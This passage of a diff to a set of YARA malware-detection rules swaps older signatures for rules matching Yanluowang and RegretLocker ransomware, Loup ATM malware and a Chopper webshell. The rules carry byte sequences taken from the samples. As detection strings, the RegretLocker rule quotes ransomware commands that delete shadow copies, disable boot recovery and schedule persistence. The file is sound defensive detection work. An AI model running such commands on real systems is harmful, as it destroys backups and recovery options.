85 f0 00 00 00 48 8d 15 dd c3 01 00 48 8d 8d 00 02 00 00 48 89 44 24 20 e8 fc 10 00 00 33 ff 48 8d 4d e0 48 89 7c 24 30 44 8d 47 03 45 33 c9 ba 00 00 00 40 c7 44 24 28 80 00 00 00 c7 44 24 20 02 00 00 00 ff 15 6f 2f 02 00 48 8b d8 }
+		$seq5 = { 48 89 5c 24 10 48 89 74 24 18 48 89 7c 24 20 55 48 8d ac 24 70 f2 ff ff 48 81 ec 90 0e 00 00 48 8b 05 da ed 01 00 48 33 c4 48 89 85 80 0d 00 00 48 8b f1 48 8d 8d 81 05 00 00 33 d2 41 b8 ff 07 00 00 c6 85 80 05 00 00 00 e8 b2 4a 00 00 48 8d 4d 71 33 d2 41 b8 03 01 00 00 c6 45 70 00 e8 9d 4a 00 00 33 c0 c6 44 24 50 00 39 05 f4 1c 02 00 89 44 24 51 75 0b e8 b5 dd ff ff 89 05 e3 1c 02 00 48 8d 4d 70 e8 c6 e3 ff ff 8b 05 e8 b5 01 00 48 8d 8d 81 01 00 00 89 44 24 50 0f b6 05 da b5 01 00 33 d2 41 b8 ff 03 00 00 c6 85 80 01 00 00 00 88 44 24 54 e8 46 4a 00 00 48 8d 15 3f b6 01 00 48 8d 8d 80 01 00 00 e8 b3 1f 00 00 48 8d 4d 90 33 d2 0f 10 05 b6 b6 01 00 0f 10 0d bf b6 01 00 41 b8 d4 00 00 00 0f 29 44 24 60 0f 29 4c 24 70 0f 10 05 b8 b6 01 00 0f 29 45 80 e8 ff 49 00 00 48 83 cb ff 48 8b c3 0f 1f 84 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 40KB and 5 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 60KB and 4 of ( $seq* )
 }
-rule ARKBIRD_SOLG_MAL_Skinnyboy_Launcher_Jun_2021_1 : FILE
+rule ARKBIRD_SOLG_RAN_Yanluowang_Dec_2021_1 : FILE
 {
 	meta:
-		description = "Detect the Launcher of SkinnyBoy"
+		description = "Detect Yanluowang ransomware"
 		author = "Arkbird_SOLG"
-		id = "4e69cba4-92ef-5ea5-95d8-b22ed77f515c"
-		date = "2021-06-05"
-		modified = "2021-06-06"
-		reference = "https://cluster25.io/wp-content/uploads/2021/05/2021-05_FancyBear.pdf"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-06/APT28/MAL_SkinnyBoy_Launcher_Jun_2021_1.yara#L1-L19"
+		id = "339d3dab-9bdd-5a46-8261-c32862ccc3bf"
+		date = "2021-12-17"
+		modified = "2021-12-18"
+		reference = "https://samples.vx-underground.org/samples/Families/YanluowangRansomware/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-12-18/RAN_Yanluowang_Dec_2021_1.yara#L1-L20"
 		license_url = "N/A"
-		logic_hash = "4d5906832a1bc90552255ada1cc9e3c7cd3e14e4b0cb11b1bf2c11c57bca8ad8"
+		logic_hash = "0144874fb24411b4378a2e2992934e674808f01ecc38f23d0d9d37e1d45621e4"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "2a652721243f29e82bdf57b565208c59937bbb6af4ab51e7b6ba7ed270ea6bce"
-		tlp = "White"
-		adversary = "APT28"
+		hash1 = "49d828087ca77abc8d3ac2e4719719ca48578b265bbb632a1a7a36560ec47f2d"
+		hash2 = "d11793433065633b84567de403c1989640a07c9a399dd2753aaf118891ce791c"
+		tlp = "white"
+		adversary = "-"
 
 	strings:
-		$s1 = { 55 8b ec 83 e4 f8 81 ec bc 06 00 00 a1 00 e0 40 00 33 c4 89 84 24 b8 06 00 00 53 56 57 33 c0 68 06 02 00 00 50 66 89 84 24 b8 02 00 00 8d 84 24 ba 02 00 00 50 8b f1 e8 64 31 00 00 8b 1d 28 90 40 00 0f 57 c0 83 c4 0c 8d 84 24 9c 02 00 00 50 c7 84 24 a0 02 00 00 79 00 00 00 66 0f d6 84 24 a4 02 00 00 66 0f d6 84 24 ac 02 00 00 c7 84 24 78 02 00 00 57 00 00 00 66 0f d6 84 24 7c 02 00 00 66 0f d6 84 24 84 02 00 00 ff d3 8b d0 33 c9 89 15 38 fb 40 00 85 d2 74 1b 8d 9b 00 00 00 00 66 8b 84 4c 74 02 00 00 66 31 84 4c 9c 02 00 00 41 3b ca 72 eb a1 80 cd 40 00 89 84 24 88 02 00 00 0f b7 05 84 cd 40 00 66 89 84 24 8c 02 00 00 a1 88 cd 40 00 89 84 24 74 02 00 00 0f b7 05 8c cd 40 00 66 89 84 24 78 02 00 00 0f 57 c0 8d 84 24 88 02 00 00 50 66 0f d6 84 24 92 02 00 00 c7 84 24 9a 02 00 00 00 00 00 00 66 c7 84 24 9e 02 00 00 00 00 66 0f d6 84 24 7e 02 00 00 c7 84 24 86 02 00 00 00 00 00 00 66 c7 84 24 8a 02 00 00 00 00 ff d3 8b d0 33 c9 89 15 38 fb 40 00 }
-		$s2 = { 66 8b 84 4c 74 02 00 00 66 31 84 4c 88 02 00 00 41 3b ca 72 eb 6a 64 6a 08 ff 15 30 90 40 00 50 ff 15 34 90 40 00 8b 1d 3c 90 40 00 89 44 24 0c 56 8d 84 24 b4 02 00 00 50 ff d3 8b 3d 44 91 40 00 8d 84 24 b0 02 00 00 50 ff d7 68 90 cd 40 00 8d 84 24 b4 02 00 00 50 ff d3 8d 44 24 20 50 8d 84 24 b4 02 00 00 50 ff 15 40 90 40 00 8b f0 8d 84 24 b0 02 00 00 50 89 74 24 14 ff 15 40 91 40 00 8d 84 24 b0 02 00 00 50 ff d7 83 fe ff 0f 84 21 02 00 00 8b 35 2c 90 40 00 8d 9b 00 00 00 00 8d 84 24 9c 02 00 00 50 8d 44 24 50 50 ff d6 85 }
-		$s3 = { ff 15 20 90 40 00 8d 44 24 14 50 6a 00 6a 00 68 0c 80 00 00 ff 74 24 28 ff 15 04 90 40 00 ff 15 20 90 40 00 6a 00 56 8d 44 24 54 50 ff 74 24 20 ff 15 14 90 40 00 ff 15 20 90 40 00 6a 00 8d 44 24 20 50 ff 74 24 14 c7 44 24 28 64 00 00 00 6a 02 ff 74 24 24 ff 15 10 90 40 00 ff 74 24 14 ff 15 00 90 40 00 6a 00 ff 74 24 1c ff 15 0c 90 40 00 8b 74 24 1c 8b 4c 24 0c ba 90 ed 40 00 83 ee }
-		$s4 = { 0f b7 8c 05 f8 fd ff ff 66 31 8c 05 f8 fe ff ff 0f b7 8c 05 fa fd ff ff 66 31 8c 05 fa fe ff ff 0f b7 8c 05 fc fd ff ff 66 31 8c 05 fc fe ff ff 0f b7 8c 05 fe fd ff ff 66 31 8c 05 fe fe ff ff 83 c0 08 3d 00 01 00 00 72 b6 56 8d 85 f8 fe ff ff 50 8d 85 f0 fb ff ff 68 08 02 00 00 50 e8 ed 04 00 00 6a 44 8d 85 98 fb ff ff 6a 00 50 e8 ed 31 00 00 83 c4 1c 8d 85 e0 fb ff ff 50 8d 85 98 fb ff ff 50 6a 00 6a 00 68 00 00 00 08 6a 00 6a 00 6a 00 8d 85 f0 fb ff ff 50 6a 00 c7 85 98 fb ff ff 44 00 00 00 ff 15 38 90 40 00 8b 4d fc 33 cd 5e e8 b9 04 00 00 8b e5 }
-		$s5 = { 55 8b ec 81 ec 6c 04 00 00 a1 00 e0 40 00 33 c5 89 45 fc 56 33 c0 68 06 02 00 00 50 66 89 85 f0 fb ff ff 8d 85 f2 fb ff ff 50 8b f1 e8 8f 33 00 00 68 04 01 00 00 8d 85 f0 fb ff ff 6a 00 50 e8 7c 33 00 00 83 c4 18 56 ff 15 48 91 40 00 85 c0 0f 84 b6 01 00 00 b8 69 00 00 00 68 d2 00 00 00 66 89 85 24 ff ff ff 8d 85 26 ff ff ff 6a 00 50 c7 85 f8 fe ff ff 1f 00 16 00 c7 85 fc fe ff ff 0b 00 22 00 c7 85 00 ff ff ff 78 00 7c 00 c7 85 04 ff ff ff 00 00 55 00 c7 85 08 ff ff ff 5b 00 2e 00 c7 85 0c ff ff ff 3f 00 03 00 c7 85 10 ff ff ff 04 00 04 00 c7 85 14 ff ff ff 0d 00 15 00 c7 85 18 ff ff ff 47 00 44 00 c7 85 1c ff ff ff 47 00 14 00 c7 85 20 ff ff ff 09 00 68 00 e8 dd 32 00 00 f3 0f 7e 05 48 cd 40 00 66 0f d6 85 f8 fd ff ff f3 0f 7e 05 50 cd 40 00 66 0f d6 85 00 fe ff ff f3 0f 7e 05 58 cd 40 00 66 0f d6 85 08 fe ff ff f3 0f 7e 05 60 cd 40 00 66 0f d6 85 10 fe ff ff f3 0f 7e 05 68 cd 40 00 68 d0 00 00 00 66 0f d6 85 18 fe ff ff f3 0f 7e 05 70 cd 40 00 8d 85 28 fe ff ff 6a 00 50 66 0f d6 85 20 fe ff ff e8 6a 32 00 00 83 c4 18 33 }
-		$s6 = { 0f b7 8c 05 f8 fd ff ff 66 31 8c 05 f8 fe ff ff 0f b7 8c 05 fa fd ff ff 66 31 8c 05 fa fe ff ff 0f b7 8c 05 fc fd ff ff 66 31 8c 05 fc fe ff ff 0f b7 8c 05 fe fd ff ff 66 31 8c 05 fe fe ff ff 83 c0 08 3d 00 01 00 00 72 b6 56 8d 85 f8 fe ff ff 50 8d 85 f0 fb ff ff 68 08 02 00 00 50 e8 ed 04 00 00 6a 44 8d 85 98 fb ff ff 6a 00 50 e8 ed 31 00 00 83 c4 1c 8d 85 e0 fb ff ff 50 8d 85 98 fb ff ff 50 6a 00 6a 00 68 00 00 00 08 6a 00 6a 00 6a 00 8d 85 f0 fb ff ff 50 6a 00 c7 85 98 fb ff ff 44 00 00 00 ff 15 38 90 40 00 8b 4d fc 33 cd 5e e8 b9 04 00 00 8b e5 }
+		$s1 = { 6a 00 68 7b 4d 45 00 e8 52 2a 00 00 6a 00 6a 00 68 44 58 45 00 68 78 58 45 00 68 d8 56 45 00 c6 45 fc 15 8b 3d d8 71 44 00 6a 00 ff d7 6a 00 6a 00 68 80 58 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 a0 58 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 b8 58 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 cc 58 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 e4 58 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 fc 58 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 10 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 2c 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 40 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 54 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 68 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 88 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 a0 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 b8 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 d0 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 ec 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 00 5a 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 14 5a 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 28 5a 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 40 5a 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 54 5a 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 80 58 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 68 5a 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 7c 5a 45 00 68 78 58 45 00 }
+		$s2 = { 83 bd d4 ee ff ff 10 8d 85 c0 ee ff ff 51 0f 43 85 c0 ee ff ff 8d 8d 90 ee ff ff 50 6a 30 68 a0 56 45 00 8d 85 c0 ee ff ff 50 ff b5 e8 ee ff ff e8 83 45 00 00 83 bd a4 ee ff ff 10 8d 85 90 ee ff ff 6a 00 0f 43 85 90 ee ff ff 6a 00 50 68 d4 56 45 00 68 d8 56 45 00 6a 00 ff d7 8b 95 a4 ee ff ff 83 fa 10 72 2f 8b 8d 90 ee ff ff 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc }
+		$s3 = { 68 00 00 00 f0 6a 01 6a 00 6a 00 8d 85 5c ee ff ff 50 ff 15 14 70 44 00 8d 85 40 ee ff ff 50 57 6a 01 ff b5 5c ee ff ff ff 15 40 70 44 00 8b 35 1c 70 44 00 8d 85 60 ec ff ff 6a 20 50 6a 00 6a 00 6a 01 6a 00 ff b5 40 ee ff ff c7 85 e8 ee ff ff 20 00 00 00 c7 85 60 ec ff ff 20 00 00 00 ff d6 ff b5 60 ec ff ff e8 1f cc 01 00 8b 8d 50 ec ff ff 83 c4 04 89 85 4c ec ff ff 0f 10 01 0f 11 00 0f 10 41 10 8d 8d e8 ee ff ff 0f 11 40 10 ff b5 60 ec ff ff 51 50 6a 00 6a 01 6a 00 ff b5 40 ee ff ff ff d6 8d 85 6c ec ff ff 33 ff 50 57 6a 01 68 80 00 00 00 ff b5 4c ec ff ff 89 bd 40 ec ff ff 89 bd bc ee ff ff ff 15 3c 70 44 00 85 c0 74 47 ff b5 6c ec ff ff e8 ae cb 01 00 83 c4 04 8b f0 8d 85 6c ec ff ff 89 b5 bc ee ff ff 50 56 6a 01 68 80 00 00 00 ff b5 4c ec ff ff ff 15 3c 70 44 00 85 }
+		$s4 = { 8b ec 6a ff 68 2b 52 44 00 64 a1 00 00 00 00 50 81 ec 8c 02 00 00 a1 c0 c8 45 00 33 c5 89 45 f0 56 57 50 8d 45 f4 64 a3 00 00 00 00 6a 05 33 c0 c7 45 c0 00 00 00 00 68 84 57 45 00 8d 4d c0 c7 45 d0 00 00 00 00 c7 45 d4 07 00 00 00 66 89 45 c0 e8 59 3f 00 00 c7 45 fc 00 00 00 00 8d 4d d8 6a 03 33 c0 c7 45 d8 00 00 00 00 68 90 57 45 00 c7 45 e8 00 00 00 00 c7 45 ec 07 00 00 00 66 89 45 d8 e8 28 3f 00 00 6a 00 6a 0f c7 45 fc 01 00 00 00 ff 15 98 70 44 00 8b f0 89 b5 74 fd ff ff 83 fe ff 0f 84 2c 02 00 00 a1 9c 70 44 00 8d 7d c0 8b 0d 48 70 44 00 89 85 7c fd ff ff a1 80 70 44 00 89 85 78 fd ff ff a1 4c 70 44 00 89 85 80 fd ff ff a1 90 70 44 00 c7 85 88 fd ff ff 00 00 00 00 89 bd 84 fd ff ff 89 8d 6c fd ff ff 89 85 70 fd ff ff 66 66 66 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 40KB and 5 of ( $s* )
+		uint16( 0 ) == 0x5A4D and filesize > 100KB and all of ( $s* )
 }
-rule ARKBIRD_SOLG_Malware_Casbaneiro_MSI : FILE
+
+rule ARKBIRD_SOLG_Mal_ATM_Loup_Aug_2020_1 : FILE
 {
 	meta:
-		description = "Detect MSIPackage used by Casbaneiro"
+		description = "Detect ATM malware Loup by theirs strings."
 		author = "Arkbird_SOLG"
-		id = "47a5ea47-f799-5467-a482-9816c0de3ecf"
-		date = "2020-06-05"
-		modified = "2020-06-05"
-		reference = "https://twitter.com/JAMESWT_MHT/status/1268811438707159040"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-05/Casbaneiro/Casbaneiro_stealer.yar#L3-L22"
+		id = "07c0fe02-a82a-58a7-8776-748a1c986f93"
+		date = "2020-08-17"
+		modified = "2020-08-18"
+		reference = "https://twitter.com/r3c0nst/status/1295275546780327936"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-17/Loup/Mal_ATM_Loup_Aug_2020_1.yar#L3-L34"
 		license_url = "N/A"
-		logic_hash = "fa1c53268d51b4b34b4cf4cd84ddb43ffba1dfa8bbe73cd7506f5e31e970855b"
+		logic_hash = "18e4d6af5d89746b42c87d7311e442f61deff3bfcbf57cc008d87290e91baafb"
 		score = 75
-		quality = 71
+		quality = 67
 		tags = "FILE"
-		hash1 = "8e77a2e1d30600db01a8481d232b601581faee02b7ec44c1ad9d74ec3544ba7d"
+		hash1 = "6c9e9f78963ab3e7acb43826906af22571250dc025f9e7116e0201b805dc1196"
 
 	strings:
-		$x1 = "C:\\Branch\\win\\Release\\custact\\x86\\vmdetect.pdb" fullword ascii
-		$s2 = "C:\\Branch\\win\\Release\\custact\\\\x86\\AICustAct.pdb" fullword ascii
-		$s3 = ";!@Install@!UTF-8!\\nTitle=\"Mozilla Firefox\"\\nRunProgram=\"setup-stub.exe\"\\n;!@InstallEnd@!7z" fullword ascii
-		$s4 = "__MOZCUSTOM__:campaign%3D%2528not%2Bset%2529%26content%3D%2528not%2Bset%2529%26medium%3Dreferral%26source%3Dwww.google.com" fullword ascii
-		$s5 = "https://www.mozilla.com0\\r" fullword wide
-		$s6 = "__CxxFrameHandler" fullword ascii
-		$s7 = "release+certificates@mozilla.com" fullword ascii
-		$s8 = "setup-stub.exe" fullword ascii
-		$s9 = "7zS.sfx.exe" fullword ascii
+		$pdb1 = "C:\\Users\\muham\\source\\repos\\loup\\Debug\\loup.pdb" fullword ascii
+		$pdb2 = "PDBOpenValidate5" fullword ascii
+		$dbg1 = "Run-Time Check Failure #%d - %s" fullword ascii
+		$dbg2 = "Unknown Filename" fullword ascii
+		$dbg3 = "Unknown Module Name" fullword ascii
+		$info1 = "%s%s%p%s%zd%s%d%s%s%s%s%s" fullword ascii
+		$info2 = { 41 64 64 72 65 73 73 3a 20 30 78 }
+		$info3 = { 53 69 7a 65 3a }
+		$info4 = { 44 61 74 61 3a }
+		$s1 = "MSXFS.dll" fullword ascii
+		$s2 = "WFSExecute" fullword ascii
+		$s3 = "WfsVersion" fullword ascii
+		$s4 = "SvcVersion" fullword ascii
+		$s5 = "SpiVersion" fullword ascii
+		$s6 = "CurrencyDispenser1" fullword ascii
+		$s7 = "WFSUnlock" fullword ascii
+		$s8 = "WFSFreeResult" fullword ascii
+		$s9 = "WFSCleanUp" fullword ascii
+		$s10 = "WFSOpen" fullword ascii
+		$s11 = "WFSClose" fullword ascii
+		$s12 = "WFSStartUp" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0xd0cf and filesize > 100KB and 7 of them
+		uint16( 0 ) == 0x5a4d and filesize < 20KB and ( pe.imphash ( ) == "190fc01f66c40478aa91be89a98c57e9" and ( 1 of ( $pdb* ) and 2 of ( $dbg* ) and 2 of ( $info* ) and 9 of ( $s* ) ) )
 }
-rule ARKBIRD_SOLG_RAN_Crylock_Oct_2020_1 : FILE
+rule ARKBIRD_SOLG_Ran_Regretlocker_Oct_2020_1 : FILE
 {
 	meta:
-		description = "Detect CryLock ransomware V2.0.0"
+		description = "Detect RegretLocker ransomware"
 		author = "Arkbird_SOLG"
-		id = "642211e0-b5fe-5842-ab16-ca1fc8d00ac0"
-		date = "2020-10-14"
-		modified = "2020-10-15"
-		reference = "https://twitter.com/JAMESWT_MHT/status/1316426560803680257"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-15/Crylock/RAN_CryLock_Oct_2020_1.yar#L1-L31"
+		id = "a8d58402-15e2-5d20-8d33-2e7a3f8973fd"
+		date = "2020-11-04"
+		modified = "2020-11-04"
+		reference = "https://twitter.com/VK_Intel/status/1323693700371914753"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-04/RegretLocker/Ran_RegretLocker_Oct_2020_1.yar#L1-L24"
 		license_url = "N/A"
-		logic_hash = "5d9aae41283c5738f2e584ea8d236ae64f7615ec629f9513fddb611714ddc230"
+		logic_hash = "2c63bdcee6f2a9025d3a1f73f3a38ec58da103752b88bd3a6bf79d85d8f92e4d"
 		score = 75
-		quality = 71
+		quality = 75
 		tags = "FILE"
-		hash1 = "04d8109c6c78055d772c01fefe1e5f48a70f2a65535cff17227b5a2c8506b831"
+		hash1 = "a188e147ba147455ce5e3a6eb8ac1a46bdd58588de7af53d4ad542c6986491f4"
 
 	strings:
-		$s1 = "All commands sended to execution" fullword ascii
-		$s2 = "Processesblacklist1" fullword ascii
-		$s3 = "Execute all" fullword ascii
-		$s4 = "config.txt" fullword ascii
-		$debug1 = "Processed files: " fullword ascii
-		$debug2 = "Next -->" fullword ascii
-		$debug3 = "Status: scan network" fullword ascii
-		$debug4 = { 49 45 28 41 4c 28 22 25 73 22 2c 34 29 2c 22 41 4c 28 5c 22 25 30 3a 73 5c 22 2c 33 29 22 2c 22 4a 4b 28 5c 22 25 31 3a 73 5c 22 2c 5c 22 25 30 3a 73 5c 22 29 22 29 }
-		$debug5 = { 4a 75 6d 70 49 44 28 22 22 2c 22 25 73 22 29 }
-		$debug6 = { 45 6e 63 72 79 70 74 65 64 20 62 79 20 42 6c 61 63 6b 52 61 62 62 69 74 2e 20 28 [3-10] 29 }
-		$ran1 = "w_to_decrypt.hta" wide
-		$ran2 = "<%UNDECRYPT_DATETIME%>" fullword ascii
-		$ran3 = "<%START_DATETIME%>" fullword ascii
-		$ran4 = "<%MAIN_CONTACT%>" fullword ascii
-		$ran5 = "<%RESERVE_CONTACT%>" fullword ascii
-		$ran6 = "<%HID%>" fullword ascii
+		$seq1 = { b8 05 dd 44 00 e8 07 7d 00 00 81 ec b0 06 00 00 53 56 33 db c7 45 cc 07 00 00 00 33 c0 89 5d c8 57 66 89 45 b8 40 c7 85 7c ff ff ff 02 00 00 00 c7 45 e0 ec 4a 98 ec 8d 75 e0 c7 45 e4 f9 a0 e9 47 8d 7d 80 c7 45 e8 90 1f 71 41 c7 45 ec 5a 66 34 5b 89 45 90 89 45 b0 89 45 b4 8d 45 d0 50 a5 8d 45 b0 50 53 68 00 00 3f 00 ff 75 0c a5 8d 85 7c ff ff ff 50 89 5d fc a5 a5 e8 76 50 00 00 85 c0 74 32 ff 15 74 00 45 00 50 68 88 1b 45 00 e8 ab de ff ff 8b 75 08 8d 45 b8 59 59 88 5d f0 8b ce ff 75 f0 89 5e 10 50 89 5e 14 e8 bb 50 ff ff e9 cb 01 00 00 53 8d 45 90 50 53 6a 04 53 ff 75 d0 e8 35 50 00 00 85 c0 74 08 50 68 bc 1b 45 00 eb bd 33 c0 8d bd 4c fb ff ff b9 82 00 00 00 be 04 01 00 00 f3 ab 8d 85 4c fb ff ff 89 75 d4 50 8d 45 d4 83 cb ff 50 ff 75 d0 e8 02 50 00 00 83 65 e8 00 8d 4d d8 33 c0 6a 07 5f 66 89 45 d8 8d 85 4c fb ff ff 50 89 7d ec e8 c6 6d ff ff 6a ff 68 f4 1b 45 00 8d 4d d8 c6 45 fc 01 e8 fd e8 ff ff 83 f8 ff 74 38 83 65 a8 00 33 c9 6a ff 50 8d 45 d8 66 89 4d 98 50 8d 4d 98 89 7d ac e8 3d df ff ff 83 7d ac 08 8d 45 98 0f 43 45 98 50 e8 bc 58 02 00 59 8d 4d 98 8b d8 e8 dd 69 ff ff 56 8d 85 54 fd ff ff 50 ff 15 f0 00 45 00 8b f8 8d 85 54 fd ff ff 50 8d 4d d8 e8 57 6d ff ff 8b 4d ec 8d 45 d8 8b 55 d8 83 f9 08 8b 75 e8 0f 43 c2 66 83 7c 70 fe 5c 75 16 83 f9 08 8d 45 d8 0f 43 c2 33 c9 66 89 4c 70 fe 8b 4d ec 8b 55 d8 83 f9 08 8d 45 d8 0f 43 c2 33 c9 51 51 6a 03 51 6a 03 51 50 ff 15 dc 00 45 00 8b f0 83 fe ff 74 7e 33 c9 8d 45 d4 51 50 68 04 01 00 00 8d 85 5c ff ff ff 50 51 51 68 00 00 56 00 56 ff 15 84 01 45 00 39 9d 64 ff ff ff 75 2c 8d 45 d4 50 68 04 01 00 00 8d 85 44 f9 ff ff 50 8d 85 54 fd ff ff 50 ff 15 08 01 45 00 8d 85 44 f9 ff ff 50 8d 4d b8 e8 b1 6c ff ff 56 ff 15 a8 00 45 00 68 04 01 00 00 8d 85 54 fd ff ff 50 57 ff 15 f8 00 45 00 85 c0 0f 85 29 ff ff ff 57 ff 15 fc 00 45 00 8b 75 08 33 c0 88 45 f0 8b ce ff 75 f0 89 46 10 89 46 14 8d 45 b8 50 e8 f3 4e ff ff 8d 4d d8 e8 cb 68 ff ff 8d 4d b8 e8 c3 68 ff ff 8b 4d f4 8b c6 5f 5e 5b 64 89 0d 00 00 00 00 c9 }
+		$seq2 = { 89 7d e4 e8 d5 a9 ff ff c7 04 24 88 02 00 00 6a 40 ff 15 28 01 45 00 8b f0 c7 45 d4 88 02 00 00 8d 45 d4 89 75 e8 50 56 e8 78 1b 00 00 83 f8 6f 75 17 56 ff 15 2c 01 45 00 ff 75 d4 6a 40 ff 15 28 01 45 00 8b f0 89 45 e8 8d 45 d4 50 56 e8 52 1b 00 00 85 c0 0f 84 }
+		$com1 = "bcdedit.exe / set{ default } bootstatuspolicy ignoreallfailures" fullword ascii
+		$com2 = { 63 6d 64 2e 65 78 65 00 20 26 20 00 2f 43 20 70 69 6e 67 20 31 2e 31 2e 31 2e 31 20 2d 6e 20 31 20 2d 77 20 33 30 30 30 20 3e 20 4e 75 6c 20 26 20 44 65 6c 20 2f 66 20 2f 71 20 22 25 73 22 }
+		$com3 = "bcdedit.exe / set{ default } recoveryenabled No" fullword ascii
+		$com4 = "vssadmin.exe Delete Shadows / All / Quiet" fullword ascii
+		$com5 = "schtasks /Create /SC MINUTE /TN " fullword ascii
+		$com6 = "schtasks /Delete /TN " fullword ascii
+		$str1 = { 47 45 54 20 25 73 20 48 54 54 50 2f 31 2e 30 0d 0a 48 6f 73 74 3a 20 25 73 }
+		$str2 = { 50 4f 53 54 20 25 73 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 25 73 }
+		$str3 = "Content-Type: application/x-www-form-urlencoded" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 300KB and 3 of ( $s* ) and 4 of ( $debug* ) and 4 of ( $ran* )
+		uint16( 0 ) == 0x5a4d and filesize > 200KB and all of ( $seq* ) and 4 of ( $com* ) and 2 of ( $str* )
 }
-rule ARKBIRD_SOLG_RAN_Matrix_Sep_2020_1 : FILE
+rule ARKBIRD_SOLG_APT_UNC2452_Webshell_Chopper_Mar_2021_1 : FILE
 {
 	meta:
-		description = "Detect MATRIX ransomware"
+		description = "Detect exploit listener in the exchange configuration for Webshell Chopper used by UNC2452 group"
 		author = "Arkbird_SOLG"
-		id = "a7df188c-e381-55e6-97e6-45f5830ff0d3"
-		date = "2020-10-15"
-		modified = "2020-10-15"
+		id = "174af8e1-0df0-5ad7-ac7d-a208f64cb765"
+		date = "2021-03-07"
+		modified = "2021-03-07"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-15/MATRIX/RAN_Matrix_Sep_2020_1.yar#L1-L28"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-07/UNC2452/APT_UNC2452_Webshell_Chopper_Mar_2021_1.yar#L1-L26"
 		license_url = "N/A"
-		logic_hash = "e832b258e8d2ee94ebbf2e715ca01960a92d723ee017261b18ce05d3095bf8a3"
+		logic_hash = "77bd7e5c10aa9cf2b407b37a76954b4eed163e36653e1fb3cde5de853f824cf0"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		hash1 = "7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf"
-		hash2 = "afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40"
-		hash3 = "d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829"
-		hash4 = "5474b58de90ad79d6df4c633fb773053fecc16ad69fb5b86e7a2b640a2a056d6"
 
 	strings:
-		$debug1 = "[LDRIVES]: not found!" fullword wide
-		$debug2 = "[DONE]: NO_SHARES!" fullword wide
-		$debug3 = "[ALL_LOCAL_KID]: " fullword wide
-		$debug4 = "[FINISHED]: G=" fullword wide
-		$debug5 = "[FEX_START]" fullword wide
-		$debug6 = "[LOGSAVED]" fullword wide
-		$debug7 = "[GENKEY]" fullword wide
-		$debug8 = "[SHARES]" fullword wide
-		$debug9 = "[SHARESSCAN]: " fullword wide
-		$reg1 = { 2e 00 70 00 68 00 70 00 3f 00 61 00 70 00 69 00 6b 00 65 00 79 00 3d }
-		$reg2 = { 26 00 63 00 6f 00 6d 00 70 00 75 00 73 00 65 00 72 00 3d }
-		$reg3 = { 26 00 73 00 69 00 64 00 3d 00 }
-		$reg4 = { 26 00 70 00 68 00 61 00 73 00 65 00 3d }
-		$reg5 = { 47 00 45 00 54 }
